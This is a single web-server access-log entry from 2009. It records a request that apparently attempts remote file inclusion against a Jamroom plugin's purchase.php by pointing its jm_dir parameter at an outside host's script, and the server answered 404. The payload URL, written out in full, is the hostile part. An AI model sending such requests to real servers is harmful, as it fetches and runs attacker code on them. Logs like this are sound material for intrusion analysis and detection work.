218.150.79.146 - - [17/May/2009:02:27:51 -0400] "GET /logs/access_log.Q108112400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
